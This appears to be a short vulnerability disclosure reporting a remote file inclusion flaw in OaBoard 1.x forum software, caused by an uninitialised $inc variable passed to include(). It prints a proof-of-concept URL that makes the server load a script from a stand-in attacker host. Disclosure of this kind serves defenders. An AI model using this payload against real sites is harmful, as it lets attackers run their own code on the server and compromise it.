OaBoard version 1.x have remote file inclusion . Variables $inc isn't initialized in the include() http://host/oaboard/forum.php?inc=http://evil_script/ Hessam-x (www.hessamx.net)